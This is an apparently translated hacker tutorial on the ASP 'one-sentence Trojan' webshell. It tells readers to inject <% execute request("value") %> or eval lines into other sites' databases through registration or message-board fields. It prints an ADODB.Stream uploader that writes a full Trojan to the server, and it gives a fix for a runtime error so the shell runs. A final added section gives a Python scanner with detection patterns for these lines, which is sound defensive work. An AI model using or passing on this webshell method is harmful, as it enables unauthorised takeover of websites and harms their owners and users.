The hacker inserts the following code in the email address or personal homepage field of the registration information:
Code:
<% execute request("value") %>
<% eval request("value") %>
Once you know the URL of the database, you can use a local web page to connect to the webshell. (You only need to know which ASP file the line <% eval request("value") %> was inserted into.)
This is called a one-sentence Trojan, and it is based on the B/S (browser/server) structure.
First, find a website whose database is in ASP format, and then use the message board or an article to add the sentence to the ASP database.
Or add an ASP web page.
Remember! Our goal is to add the sentence <% execute request("value") %> to the database, no matter how you do it!
Open the client (the HTM file on your computer), fill in the ASP file that contains the sentence, or the ASP web page, and then kill it! You can do what you want! (Author: Mosquito)
Principle of the one-sentence Trojan
<SCRIPT runat=server language=JavaScript> is the opening tag of a JavaScript script. The value server of the runat attribute indicates that the script runs on the server. The eval that follows is the essence of the Trojan: eval executes the string passed to it. So when the script runs on the server, request.form('#') + '' is executed as well. request.form('#') reads the content of the element in the client file whose HTML name attribute is #. For example, the following code is taken from a one-sentence client:
<textarea name=# cols="80" rows="10">
Set IP = Server.CreateObject("ADODB.Stream")
IP.Open
IP.Type = 2
IP.Charset = "gb2312"
IP.WriteText Request("aoyun")
IP.SaveToFile Server.MapPath("aoyunwan.asp"), 2
IP.Close
Set IP = Nothing
Response.Redirect "aoyunwan.asp"
</textarea>
If you have learned HTML, you will notice that the name attribute of the textarea tag is set to #. In other words, this is the code that the server side reads (using request.form('#')) and then executes (using eval(request.form('#') + '')), that is, it executes:
Set IP = Server.CreateObject("ADODB.Stream")
IP.Open
IP.Type = 2
IP.Charset = "gb2312"
IP.WriteText Request("aoyun")
IP.SaveToFile Server.MapPath("aoyunwan.asp"), 2
IP.Close
Set IP = Nothing
Response.Redirect "aoyunwan.asp"
If you have learned ASP, you should understand it. The code above first creates a stream object named IP, then uses the object's WriteText method to write the content read by Request("aoyun") (that is, the content of the second textarea field of the client, which is our Trojan code) into the file aoyunwan.asp on the server. After the write is complete, Set IP = Nothing releases the object, and Response.Redirect "aoyunwan.asp" switches to the written file, which is the "big horse" (the full Trojan) that we see at the end!
About server errors
Often, after we add the sentence to an ASP file, a Type Mismatch error occurs:
Script Error detected at line 1.
Source line: Execute request("nettoo")
Description: Type Mismatch: 'execute'
How can this problem be solved?
I have come up with a good solution. If I replace "execute" on the server side with "eval", there will be no errors!
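
From the defender's side, the two one-line forms described above (the execute/eval request line and the server-side JavaScript eval line) can be searched for in the web root and in database files saved with an .asp extension. The following is an added example, not part of the original article: the rule names, function names, file-extension list and sample inputs are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Added detection example; rule and function names are hypothetical.
# ASP ignores case and extra whitespace, so the patterns do too.
_REQ = r"request\s*(?:\.\s*(?:form|querystring)\s*)?\(\s*['\"][^'\"]{0,64}['\"]\s*\)"
PATTERNS = {
    # <% execute request("value") %> and the eval variant
    "asp-inline": re.compile(
        r"<%[^%]{0,200}?\b(?:execute|eval)\b\s*\(?\s*" + _REQ, re.I),
    # <script runat=server language=javascript> eval(request.form('#') + '')
    "jscript-server": re.compile(
        r"<script\b(?=[^>]*\brunat\s*=\s*[\"']?server)[^>]*>\s*eval\s*\(\s*" + _REQ,
        re.I),
}

def scan_bytes(data: bytes) -> list:
    """Return the sorted rule names that match in raw file content."""
    # latin-1 never fails to decode. The second view drops NUL bytes so that
    # text stored as UTF-16LE inside a database file still matches (assumption:
    # the injected field may be stored that way).
    views = (data.decode("latin-1"), data.replace(b"\x00", b"").decode("latin-1"))
    return sorted({n for n, rx in PATTERNS.items() for v in views if rx.search(v)})

def scan_tree(root, exts=(".asp", ".asa", ".mdb")) -> dict:
    """Scan files under root; exts is an assumed list, adjust per site."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            found = scan_bytes(path.read_bytes())
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits

SAMPLES = {  # constructed inputs, not taken from a real site
    "guestbook.asp": b"\x00\x01filler" + '<% eXecute request ("value") %>'.encode("utf-16-le"),
    "conn.asp": b'<%eval request("value")%>',
    "js.asp": b"<SCRIPT runat = server Language = JavaScript>"
              b"eval(Request.form('#')+'')</SCRIPT>",
    "form.asp": b'<% Response.Write Server.HTMLEncode(Request("name")) %>',
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name}: {scan_bytes(data) or 'clean'}")
```

Because the error workaround above swaps execute for eval, both keywords are covered by one rule; a hit on either is a reason to inspect the file and the form field that wrote it.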